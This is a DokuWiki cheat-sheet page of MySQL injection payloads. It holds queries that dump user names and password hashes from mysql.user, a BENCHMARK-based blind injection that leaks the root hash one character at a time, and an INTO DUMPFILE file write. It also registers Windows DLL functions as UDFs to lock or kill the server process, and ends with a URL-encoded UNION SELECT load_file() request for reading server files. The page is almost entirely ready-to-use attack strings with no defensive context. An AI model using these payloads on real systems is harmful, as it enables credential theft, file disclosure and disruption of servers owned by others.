Wiki

User Tools

Site Tools

Trace: users
hacking:sql_injection:mysql:users

Table of Contents

Hacking - SQL Injection - MySQL - Users

Users

SELECT USER,Password FROM mysql.user;
 
SELECT 1,1 UNION SELECT IF(SUBSTRING(Password,1,1)='2',BENCHMARK(100000,SHA1(1)),0) USER,Password FROM mysql.user WHERE USER = 'root';

Write query into a new file (can not modify existing files): 

SELECT ... INTO DUMPFILE

UDF (User-Defined Functions)

CREATE FUNCTION LockWorkStation RETURNS INTEGER SONAME 'user32';
SELECT LockWorkStation(); 
CREATE FUNCTION ExitProcess RETURNS INTEGER SONAME 'kernel32';
SELECT exitprocess();
 
SELECT USER();
SELECT password,USER() FROM mysql.user;

First byte of admin hash

SELECT SUBSTRING(user_password,1,1) FROM mb_users WHERE user_group = 1;

Read File

query.php?USER=1+UNION+SELECT+load_file(0x63...),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
hacking/sql_injection/mysql/users.txt · Last modified: 2020/07/15 09:30 by 127.0.0.1
Donate Powered by PHP Valid HTML5 Valid CSS Driven by DokuWiki